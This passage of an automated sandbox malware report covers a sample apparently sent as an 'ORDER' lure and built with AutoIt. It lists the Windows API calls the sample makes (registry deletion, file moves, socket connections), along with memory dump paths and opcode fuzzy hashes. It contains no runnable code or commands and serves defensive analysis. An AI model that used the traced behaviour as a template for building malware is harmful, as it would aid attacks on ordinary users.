                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _wcsncpy$LocalTime
                      • String ID:
                      • API String ID: 2945705084-0
                      • Opcode ID: 3b027db495cf325d4b53e47505d3cb20b1ad6202f82298728807acfce4b197bc
                      • Instruction ID: 182a0beeca613a2b6a70cb70be85b0a37eda02b06edfbc7a91c38eb339bdc3a0
                      • Opcode Fuzzy Hash: 3b027db495cf325d4b53e47505d3cb20b1ad6202f82298728807acfce4b197bc
                      • Instruction Fuzzy Hash: 8141C2A5C2021876CB11EBB58C86ACFB7AC9F46310F618462F918E3122E734E755C7E9
                      APIs
                        • Part of subcall function 009E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E38D3,?), ref: 009E48C7
                        • Part of subcall function 009E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E38D3,?), ref: 009E48E0
                      • lstrcmpiW.KERNEL32(?,?), ref: 009E38F3
                      • _wcscmp.LIBCMT ref: 009E390F
                      • MoveFileW.KERNEL32(?,?), ref: 009E3927
                      • _wcscat.LIBCMT ref: 009E396F
                      • SHFileOperationW.SHELL32(?), ref: 009E39DB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                      • String ID: \*.*
                      • API String ID: 1377345388-1173974218
                      • Opcode ID: d17139a83f7dcd19b3ab745cfbbf59b931491b3772b8b859ec32dc14d3ea2560
                      • Instruction ID: 0e827d4a3ff9a6b3ab070ad1b8425d3230a827b3eb330953fe050153ee1f4dfc
                      • Opcode Fuzzy Hash: d17139a83f7dcd19b3ab745cfbbf59b931491b3772b8b859ec32dc14d3ea2560
                      • Instruction Fuzzy Hash: 294193714083849EC752EF65C485ADFB7ECAF89340F10492EF489C3152EB74DA89C752
                      APIs
                      • _memset.LIBCMT ref: 00A07519
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A075C0
                      • IsMenu.USER32(?), ref: 00A075D8
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A07620
                      • DrawMenuBar.USER32 ref: 00A07633
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Menu$Item$DrawInfoInsert_memset
                      • String ID: 0
                      • API String ID: 3866635326-4108050209
                      • Opcode ID: e18da4368d2348a42df929a40d1c86925978d7a735a3466f52bd993f1503f0f9
                      • Instruction ID: 37711ffc4d028e35229aac257afd422fd4a671e3aa41ae907fc0061d77669b58
                      • Opcode Fuzzy Hash: e18da4368d2348a42df929a40d1c86925978d7a735a3466f52bd993f1503f0f9
                      • Instruction Fuzzy Hash: 61412A75A04649EFDB20DF94E884E9EBBF8FB05314F048129E956A7290DB31BD51CF90
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A0125C
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A01286
                      • FreeLibrary.KERNEL32(00000000), ref: 00A0133D
                        • Part of subcall function 00A0122D: RegCloseKey.ADVAPI32(?), ref: 00A012A3
                        • Part of subcall function 00A0122D: FreeLibrary.KERNEL32(?), ref: 00A012F5
                        • Part of subcall function 00A0122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A01318
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A012E0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                      • String ID:
                      • API String ID: 395352322-0
                      • Opcode ID: d981c594b1f6abc152a7a866e0a20c28d100e2e37433ec216a402cfdca78ed4f
                      • Instruction ID: 8302b42f851141e55cb4449ce897a7e38320369b214de7dc1fe33de4bb2d35cf
                      • Opcode Fuzzy Hash: d981c594b1f6abc152a7a866e0a20c28d100e2e37433ec216a402cfdca78ed4f
                      • Instruction Fuzzy Hash: FC310AB190111DBFEB15DFD0EC89AFEB7BCEF08300F000179E511E6591EA749E869AA1
                      APIs
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A0655B
                      • GetWindowLongW.USER32(015B92B0,000000F0), ref: 00A0658E
                      • GetWindowLongW.USER32(015B92B0,000000F0), ref: 00A065C3
                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A065F5
                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A0661F
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A06630
                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A0664A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: LongWindow$MessageSend
                      • String ID:
                      • API String ID: 2178440468-0
                      • Opcode ID: 0a212c5cf005e91f826c94429d70acef2525fd9e0a87b3f53eb3d024aaa82e4b
                      • Instruction ID: a37c6c3932d940cb75334749b9bf948c3619ddf7bc4ad74d2d65f329b3b8984c
                      • Opcode Fuzzy Hash: 0a212c5cf005e91f826c94429d70acef2525fd9e0a87b3f53eb3d024aaa82e4b
                      • Instruction Fuzzy Hash: 10310238604258AFDB20CF98EC85F553BE1FB4A718F1801A8F5019B2F5CB62B862DB41
                      APIs
                        • Part of subcall function 009F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F80CB
                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009F64D9
                      • WSAGetLastError.WSOCK32(00000000), ref: 009F64E8
                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F6521
                      • connect.WSOCK32(00000000,?,00000010), ref: 009F652A
                      • WSAGetLastError.WSOCK32 ref: 009F6534
                      • closesocket.WSOCK32(00000000), ref: 009F655D
                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F6576
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                      • String ID:
                      • API String ID: 910771015-0
                      • Opcode ID: 501cfc8e5bab0e2a831b441e67913c226fd5ad70cd83039767abc8c7561bb1b5
                      • Instruction ID: 42a9b4a00ee12df6a6f1c13adcc98704a75e5eb55e555a12b7ad3fd622a218a6
                      • Opcode Fuzzy Hash: 501cfc8e5bab0e2a831b441e67913c226fd5ad70cd83039767abc8c7561bb1b5
                      • Instruction Fuzzy Hash: C431937160021CAFDB10EF64CC85BBE7BBDEB44714F048069FA49A7291DB74AD05CBA1
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DE0FA
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DE120
                      • SysAllocString.OLEAUT32(00000000), ref: 009DE123
                      • SysAllocString.OLEAUT32 ref: 009DE144
                      • SysFreeString.OLEAUT32 ref: 009DE14D
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 009DE167
                      • SysAllocString.OLEAUT32(?), ref: 009DE175
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: 8298b514a6ae1ba5362f9cbcbcd452ff07620ee118e52b5f1d28ccbbc6abdd9e
                      • Instruction ID: 0da69afa8471604c12679bd39bbb87ec7c3527eac15b5f3ff5d70d792825a7c9
                      • Opcode Fuzzy Hash: 8298b514a6ae1ba5362f9cbcbcd452ff07620ee118e52b5f1d28ccbbc6abdd9e
                      • Instruction Fuzzy Hash: DB214135644208AFDB20FFA8DC88DAB77ECEB09760B10C126F915DB660DA75DC46CB64
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                      • API String ID: 1038674560-2734436370
                      • Opcode ID: 87b9a5bca32aebc55f003b82abad828dca25f6bbba091c9434e362485f8947d9
                      • Instruction ID: dfe7e4a835e84d7343d073d3786980d3557e84ac192a29ae939a368e08f04b1d
                      • Opcode Fuzzy Hash: 87b9a5bca32aebc55f003b82abad828dca25f6bbba091c9434e362485f8947d9
                      • Instruction Fuzzy Hash: 9821283219415566D220AA34DC23FB7B39CEF92350F14C437F8CB86281EB5999919391
                      APIs
                        • Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
                        • Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
                        • Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A078A1
                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A078AE
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A078B9
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A078C8
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A078D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$CreateObjectStockWindow
                      • String ID: Msctls_Progress32
                      • API String ID: 1025951953-3636473452
                      • Opcode ID: bcd17cc8df856782985956034bb44bd49ac01387bf35f80cbe867ce3068f7811
                      • Instruction ID: 22f3e25377bfb065fd2ca4b6aef4032dfd59aa0be31a8aaaf6100b792bc28afb
                      • Opcode Fuzzy Hash: bcd17cc8df856782985956034bb44bd49ac01387bf35f80cbe867ce3068f7811
                      • Instruction Fuzzy Hash: 72118EB251021DBEEF159F60CC85EEB7F6DEF48758F018114BA04A20A0C772AC62DBA0
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,009A4292,?), ref: 009A41E3
                      • GetProcAddress.KERNEL32(00000000), ref: 009A41EA
                      • EncodePointer.KERNEL32(00000000), ref: 009A41F6
                      • DecodePointer.KERNEL32(00000001,009A4292,?), ref: 009A4213
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                      • String ID: RoInitialize$combase.dll
                      • API String ID: 3489934621-340411864
                      • Opcode ID: c701187232ed27c80c278512ae206828b894117c42e3ee30b3bef0c33f668d88
                      • Instruction ID: 63d87901f245695425c3bac28cb2426963b7b5183db4696028371daff35c9f4d
                      • Opcode Fuzzy Hash: c701187232ed27c80c278512ae206828b894117c42e3ee30b3bef0c33f668d88
                      • Instruction Fuzzy Hash: 06E012F8590744AEEB20DBF4EC49B443594B7AA706F104524B521E54E0D7B654D38F00
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A41B8), ref: 009A42B8
                      • GetProcAddress.KERNEL32(00000000), ref: 009A42BF
                      • EncodePointer.KERNEL32(00000000), ref: 009A42CA
                      • DecodePointer.KERNEL32(009A41B8), ref: 009A42E5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                      • String ID: RoUninitialize$combase.dll
                      • API String ID: 3489934621-2819208100
                      • Opcode ID: 201d8bb154c644c108438e2194d82355de1b433515401364dd1c3c827e8707bc
                      • Instruction ID: d089d9d08597706309444c31b80436a8fb02579efc5a9b477c2f1cd91944c256
                      • Opcode Fuzzy Hash: 201d8bb154c644c108438e2194d82355de1b433515401364dd1c3c827e8707bc
                      • Instruction Fuzzy Hash: B8E0BF7C541304AFEB60DBE4FC0EB443AA4B759746F204525F511F54A0CBB58593CB15
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memmove$__itow__swprintf
                      • String ID:
                      • API String ID: 3253778849-0
                      • Opcode ID: ecd8279f8e72c8688cf3691b7744d89f1efaaf694fdcfa3f8cbe5a350d748cde
                      • Instruction ID: 6711fac0055f28292519b18dbc72e174a2d0f8a6ba718b5197835c6a46df6e6f
                      • Opcode Fuzzy Hash: ecd8279f8e72c8688cf3691b7744d89f1efaaf694fdcfa3f8cbe5a350d748cde
                      • Instruction Fuzzy Hash: F861CE3050029A9BCF12FF65CC82FFE77A8AF95348F084519F8595B292DB35AD41CB90
                      APIs
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                        • Part of subcall function 00A010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A00038,?,?), ref: 00A010BC
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00548
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A00588
                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A005AB
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A005D4
                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A00617
                      • RegCloseKey.ADVAPI32(00000000), ref: 00A00624
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                      • String ID:
                      • API String ID: 4046560759-0
                      • Opcode ID: ca94d20fd71feebd97337668ec36992d868ce4edf2b5b71eb2a539cb159fa3c6
                      • Instruction ID: 884db303a5bf59dbf896225fab94fbfd5bc33afba57e2c13241c6e375f43d697
                      • Opcode Fuzzy Hash: ca94d20fd71feebd97337668ec36992d868ce4edf2b5b71eb2a539cb159fa3c6
                      • Instruction Fuzzy Hash: AC515631208204AFCB14EF64D885F6EBBE9FF89314F04892DF585972A2DB71E905CB52
                      APIs
                      • GetMenu.USER32(?), ref: 00A05A82
                      • GetMenuItemCount.USER32(00000000), ref: 00A05AB9
                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A05AE1
                      • GetMenuItemID.USER32(?,?), ref: 00A05B50
                      • GetSubMenu.USER32(?,?), ref: 00A05B5E
                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00A05BAF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Menu$Item$CountMessagePostString
                      • String ID:
                      • API String ID: 650687236-0
                      • Opcode ID: 4682cd1d78b8c81efe159fc93b82949c5c45d9c275f0a3e6ed1607d66966f044
                      • Instruction ID: 3d51f81a078a7348653a6f4a71882c05962f3ac792e33ef8f89cf2540860aa04
                      • Opcode Fuzzy Hash: 4682cd1d78b8c81efe159fc93b82949c5c45d9c275f0a3e6ed1607d66966f044
                      • Instruction Fuzzy Hash: 55517F35E00619AFCB15EFA4D885AAEB7B4EF49310F144469E812B7391DB71BE41CF90
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 009DF3F7
                      • VariantClear.OLEAUT32(00000013), ref: 009DF469
                      • VariantClear.OLEAUT32(00000000), ref: 009DF4C4
                      • _memmove.LIBCMT ref: 009DF4EE
                      • VariantClear.OLEAUT32(?), ref: 009DF53B
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009DF569
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Variant$Clear$ChangeInitType_memmove
                      • String ID:
                      • API String ID: 1101466143-0
                      • Opcode ID: 1fe7bd21118abafe8e418c1fed17c78183ed32ea87b85eb668c124be21c3b932
                      • Instruction ID: e34e75afccaf16e220a273a3d3606d6c1a2a9f343b8469d5cfdc2155cf088395
                      • Opcode Fuzzy Hash: 1fe7bd21118abafe8e418c1fed17c78183ed32ea87b85eb668c124be21c3b932
                      • Instruction Fuzzy Hash: E6515AB5A00209AFCB10CF58D894AAAB7F8FF4C354B15856AFD59DB311D730E912CBA0
                      APIs
                      • _memset.LIBCMT ref: 009E2747
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2792
                      • IsMenu.USER32(00000000), ref: 009E27B2
                      • CreatePopupMenu.USER32 ref: 009E27E6
                      • GetMenuItemCount.USER32(000000FF), ref: 009E2844
                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009E2875
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                      • String ID:
                      • API String ID: 3311875123-0
                      • Opcode ID: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
                      • Instruction ID: 5dad682262d79b5e7e0b63b929c51f67a2e6a343462750aeef164ef4d4184cf0
                      • Opcode Fuzzy Hash: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
                      • Instruction Fuzzy Hash: 4B518D70A00289EFDF26CF6AC888BAEBBFCBF44314F104569E415AB291D7709D45CB51
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 0098179A
                      • GetWindowRect.USER32(?,?), ref: 009817FE
                      • ScreenToClient.USER32(?,?), ref: 0098181B
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0098182C
                      • EndPaint.USER32(?,?), ref: 00981876
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
